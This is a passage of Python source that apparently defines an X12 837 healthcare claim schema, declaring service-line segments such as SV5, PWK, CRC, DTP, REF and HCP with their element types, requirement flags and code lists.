position=12, codes=["Y"], ), ), Element( "SV113", Properties( desc="Review Code", req_sit="N", data_type=("ID", "1", "2"), position=13, codes=[], ), ), Element( "SV114", Properties( desc="National or Local Assigned Review Value", req_sit="N", data_type=("AN", "1", "2"), position=14, codes=[], ), ), Element( "SV115", Properties( desc="Copay Status Code", req_sit="S", data_type=("ID", "1", "1"), position=15, codes=["0"], ), ), Element( "SV116", Properties( desc="Health Care Professional Shortage Area Code", req_sit="N", data_type=("ID", "1", "1"), position=16, codes=[], ), ), Element( "SV117", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=17, codes=[], ), ), Element( "SV118", Properties( desc="Postal Code", req_sit="N", data_type=("ID", "3", "15"), position=18, codes=[], ), ), Element( "SV119", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=19, codes=[], ), ), Element( "SV120", Properties( desc="Level of Care Code", req_sit="N", data_type=("ID", "1", "1"), position=20, codes=[], ), ), Element( "SV121", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=21, codes=[], ), ), ), Segment( "SV5", Properties( desc="Durable Medical Equipment Service", position="4000", repeat="1", req_sit="S", syntax="R0405 C0604", ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="01", ), Element( "SV501-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["HC"], ), ), Element( "SV501-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SV501-03", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SV501-04", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SV501-05", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SV501-06", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SV501-07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SV501-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SV502", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["DA"], ), ), Element( "SV503", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=3, codes=[], ), ), Element( "SV504", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "SV505", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=5, codes=[], ), ), Element( "SV506", Properties( desc="Frequency Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["1", "4", "6"], ), ), Element( "SV507", Properties( desc="Prognosis Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), ), Segment( "PWK", Properties( desc="Line Supplemental Information", position="4200", repeat="10", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "03", "04", "05", "06", "07", "08", "09", "10", "11", "13", "15", "21", "A3", "A4", "AM", "AS", "B2", "B3", "B4", "BR", "BS", "BT", "CB", "CK", "CT", "D2", "DA", "DB", "DG", "DJ", "DS", "EB", "HC", "HR", "I5", "IR", "LA", "M1", "MT", "NN", "OB", "OC", "OD", "OE", "OX", "OZ", "P4", "P5", "PE", "PN", "PO", "PQ", "PY", "PZ", "RB", "RR", "RT", "RX", "SG", "V5", "XP", ], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AA", "BM", "EL", "EM", "FT", "FX"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=5, codes=["AC"], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "PWK", Properties( desc="Durable Medical Equipment Certificate of Medical Necessity Indicator", position="4200", repeat="1", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["CT"], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AB", "AD", "AF", "AG", "NS"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "CR1", Properties( desc="Ambulance Transport Information", position="4250", repeat="1", req_sit="S", syntax="P0102 P0506", ), Element( "CR101", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=1, codes=["LB"], ), ), Element( "CR102", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CR103", Properties( desc="Ambulance Transport Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), Element( "CR104", Properties( desc="Ambulance Transport Reason Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "B", "C", "D", "E"], ), ), Element( "CR105", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["DH"], ), ), Element( "CR106", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR107", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=7, codes=[], ), ), Element( "CR108", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=8, codes=[], ), ), Element( "CR109", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=9, codes=[], ), ), Element( "CR110", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), ), Segment( "CR3", Properties( desc="Durable Medical Equipment Certification", position="4350", repeat="1", req_sit="S", syntax="P0203", ), Element( "CR301", Properties( desc="Certification Type Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["I", "R", "S"], ), ), Element( "CR302", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["MO"], ), ), Element( "CR303", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=3, codes=[], ), ), Element( "CR304", Properties( desc="Insulin Dependent Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Element( "CR305", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=5, codes=[], ), ), ), Segment( "CRC", Properties( desc="Ambulance Certification", position="4500", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["07"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), ), Segment( "CRC", Properties( desc="Hospice Employee Indicator", position="4500", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["70"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["65"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=[], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "CRC", Properties( desc="Condition Indicator/Durable Medical Equipment", position="4500", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["09"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["38", "ZV"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["38", "ZV"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=["38", "ZV"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=["38", "ZV"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=["38", "ZV"], ), ), ), Segment( "DTP", Properties( desc="Date - Service Date", position="4550", repeat="1", req_sit="R", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["472"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8", "RD8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Prescription Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["471"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="DATE - Certification Revision/Recertification Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["607"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Begin Therapy Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["463"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Certification Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["461"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Seen Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["304"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Test Date", position="4550", repeat="2", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["738", "739"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Shipped Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["011"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last X-ray Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["455"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Initial Treatment Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["454"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "QTY", Properties( desc="Ambulance Patient Count", position="4600", repeat="1", req_sit="S", syntax="E0204 R0204", ), Element( "QTY01", Properties( desc="Quantity Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["PT"], ), ), Element( "QTY02", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), Element( "QTY04", Properties( desc="Free-form Information", req_sit="N", data_type=("AN", "1", "30"), position=4, codes=[], ), ), ), Segment( "QTY", Properties( desc="Obstetric Anesthesia Additional Units", position="4600", repeat="1", req_sit="S", syntax="E0204 R0204", ), Element( "QTY01", Properties( desc="Quantity Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["FL"], ), ), Element( "QTY02", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), Element( "QTY04", Properties( desc="Free-form Information", req_sit="N", data_type=("AN", "1", "30"), position=4, codes=[], ), ), ), Segment( "MEA", Properties( desc="Test Result", position="4620", repeat="5", req_sit="S", syntax="R03050608 L050412 L060412 L07030506 E0803 P1112", ), Element( "MEA01", Properties( desc="Measurement Reference ID Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["OG", "TR"], ), ), Element( "MEA02", Properties( desc="Measurement Qualifier", req_sit="R", data_type=("ID", "1", "3"), position=2, codes=["HT", "R1", "R2", "R3", "R4"], ), ), Element( "MEA03", Properties( desc="Measurement Value", req_sit="R", data_type=("R", "1", "20"), position=3, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="04", ), ), Element( "MEA05", Properties( desc="Range Minimum", req_sit="N", data_type=("R", "1", "20"), position=5, codes=[], ), ), Element( "MEA06", Properties( desc="Range Maximum", req_sit="N", data_type=("R", "1", "20"), position=6, codes=[], ), ), Element( "MEA07", Properties( desc="Measurement Significance Code", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "MEA08", Properties( desc="Measurement Attribute Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "MEA09", Properties( desc="Surface/Layer/Position Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "MEA10", Properties( desc="Measurement Method or Device", req_sit="N", data_type=("ID", "2", "4"), position=10, codes=[], ), ), Element( "MEA11", Properties( desc="Code List Qualifier Code", req_sit="N", data_type=("ID", "1", "3"), position=11, codes=[], ), ), Element( "MEA12", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=12, codes=[], ), ), ), Segment( "CN1", Properties( desc="Contract Information", position="4650", repeat="1", req_sit="S", syntax="", ), Element( "CN101", Properties( desc="Contract Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "02", "03", "04", "05", "06", "09"], ), ), Element( "CN102", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CN103", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=3, codes=[], ), ), Element( "CN104", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "CN105", Properties( desc="Terms Discount Percent", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), Element( "CN106", Properties( desc="Version Identifier", req_sit="S", data_type=("AN", "1", "30"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Repriced Line Item Reference Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9B"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Adjusted Repriced Line Item Reference Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9D"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Prior Authorization", position="4700", repeat="5", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "REF", Properties( desc="Line Item Control Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["6R"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mammography Certification Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EW"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Clinical Laboratory Improvement Amendment (CLIA) Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["X4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referring Clinical Laboratory Improvement Amendment (CLIA) Facility Identification", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Immunization Batch Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["BT"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referral Number", position="4700", repeat="5", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "AMT", Properties( desc="Sales Tax Amount", position="4750", repeat="1", req_sit="S", syntax="" ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["T"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Postage Claimed Amount", position="4750", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["F4"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "K3", Properties( desc="File Information", position="4800", repeat="10", req_sit="S", syntax="", ), Element( "K301", Properties( desc="Fixed Format Information", req_sit="R", data_type=("AN", "1", "80"), position=1, codes=[], ), ), Element( "K302", Properties( desc="Record Format Code", req_sit="N", data_type=("ID", "1", "2"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), ), Segment( "NTE", Properties( desc="Line Note", position="4850", repeat="1", req_sit="S", syntax="" ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["ADD", "DCP"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "NTE", Properties( desc="Third Party Organization Notes", position="4850", repeat="1", req_sit="S", syntax="", ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["TPO"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "PS1", Properties( desc="Purchased Service Information", position="4880", repeat="1", req_sit="S", syntax="", ), Element( "PS101", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "PS102", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "PS103", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), ), Segment( "HCP", Properties( desc="Line Pricing/Repricing Information", position="4920", repeat="1", req_sit="S", syntax="R0113 P0910 P1112", ), Element( "HCP01", Properties( desc="Pricing Methodology", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12", "13", "14", ], ), ), Element( "HCP02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "HCP03", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "HCP04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "HCP05", Properties( desc="Rate", req_sit="S", data_type=("R", "1", "9"), position=5, codes=[], ), ), Element( "HCP06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "HCP07", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=7, codes=[], ), ), Element( "HCP08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=8, codes=[], ), ), Element( "HCP09", Properties( 